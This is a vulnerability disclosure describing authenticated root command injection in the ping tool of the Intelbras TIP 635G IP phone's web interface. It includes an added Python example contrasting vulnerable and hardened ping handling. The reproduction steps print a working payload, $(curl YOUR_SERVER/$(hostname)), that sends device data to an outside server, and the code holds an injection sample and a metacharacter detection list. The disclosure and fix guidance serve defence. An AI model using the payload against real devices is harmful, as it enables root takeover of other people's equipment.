Description

An authenticated OS command injection vulnerability exists in the web management interface of the Intelbras TIP 635G IP terminal. The diagnostic “ping” functionality improperly sanitizes user-supplied input and passes it directly to a system shell command. An authenticated attacker can inject arbitrary OS commands using shell command substitution (e.g., $(...)), resulting in remote code execution with root privileges. Although command output is not reflected in the web interface, successful exploitation can be confirmed via out-of-band interactions (e.g., network requests initiated by the device). This vulnerability allows full compromise of the affected device and may enable lateral movement within the network.

Version tested

[Screenshot: tested firmware version]

Reproduction Steps

  1. Access the device IP address in a browser.
  2. Log in to the web management interface.
  3. Go to SYSTEM → Tools → PING.
  4. Enter $(curl YOUR_SERVER/$(hostname)) as the ping target, press START and then STOP.
  5. Observe the incoming request, containing the device hostname, in your server logs.
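The root cause described above (user input spliced into a shell command line, so $(...) substitution runs before ping does) and the fix a vendor would ship are shown side by side in the following added example. It is illustrative code written for this write-up, not Intelbras firmware; the function names, the regex and the sample inputs are assumptions. The vulnerable function only returns the string a shell would receive, it does not execute it.

```python
"""
Added illustration (not Intelbras code): a ping diagnostic handler that
interpolates user input into a shell string, next to a hardened version that
validates the target against an allowlist and never invokes a shell.
All names here are hypothetical.
"""
import ipaddress
import re
import subprocess
from typing import List

# RFC 1123 hostname: labels of letters/digits/hyphens, no leading or trailing
# hyphen, each label at most 63 characters, whole name at most 253.
_HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)(?!-)[A-Za-z0-9-]{1,63}(?<!-)"
    r"(\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*\.?$"
)

# Shell metacharacters that a ping target never legitimately contains.
# Useful for triaging web-server access logs for attempts, not as the fix.
_INJECTION_TOKENS = ("$(", "`", ";", "|", "&", "\n")


def vulnerable_ping_command(target: str) -> str:
    """The flawed pattern: the target is concatenated into a command line
    that is later handed to /bin/sh. Returns the string, does not run it.
    Because the shell parses it, $(...) in `target` executes as a command."""
    return f"ping -c 4 {target}"


def is_valid_ping_target(target: str) -> bool:
    """Allowlist check: accept an IPv4/IPv6 literal or an RFC 1123 hostname.
    Everything else (spaces, $(, backticks, a leading '-') is rejected."""
    try:
        ipaddress.ip_address(target)
        return True
    except ValueError:
        pass
    return bool(_HOSTNAME_RE.match(target))


def hardened_ping_argv(target: str) -> List[str]:
    """Validate first, then build an argv list for subprocess with shell=False.
    No shell is involved, so substitution syntax is never interpreted, and the
    validator already rejects a leading '-' so the target cannot become a flag."""
    if not is_valid_ping_target(target):
        raise ValueError("invalid ping target")
    return ["ping", "-c", "4", target]


def run_hardened_ping(target: str, timeout_s: int = 15) -> str:
    """Execute the validated argv without a shell and return ping's stdout."""
    argv = hardened_ping_argv(target)
    result = subprocess.run(argv, capture_output=True, text=True, timeout=timeout_s)
    return result.stdout


def looks_like_injection(value: str) -> bool:
    """Detection helper for log review: flag a submitted ping target that
    carries shell substitution or command-separator characters."""
    return any(tok in value for tok in _INJECTION_TOKENS)


if __name__ == "__main__":
    # Constructed sample inputs: one benign target, one abusing substitution.
    for candidate in ("192.168.1.1", "$(id)"):
        print("vulnerable shell string:", vulnerable_ping_command(candidate))
        try:
            print("hardened argv:          ", hardened_ping_argv(candidate))
        except ValueError as exc:
            print("hardened argv:           rejected,", exc)
        print("flag for review:        ", looks_like_injection(candidate))
```

The hardened path combines two independent controls: input validation against a strict allowlist, and an argv-style process launch with no shell in between. Either alone would block the $(...) technique, but keeping both means a later change to one does not silently reopen the hole. `looks_like_injection` is only for spotting attempts in request logs; it is deliberately not the sanitizer, since denylists of metacharacters are easy to miss cases in.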

[Screenshots: reproduction of the PING tool request and the resulting server log entry]

Using the id and hostname commands

[Screenshots: results of the id and hostname commands]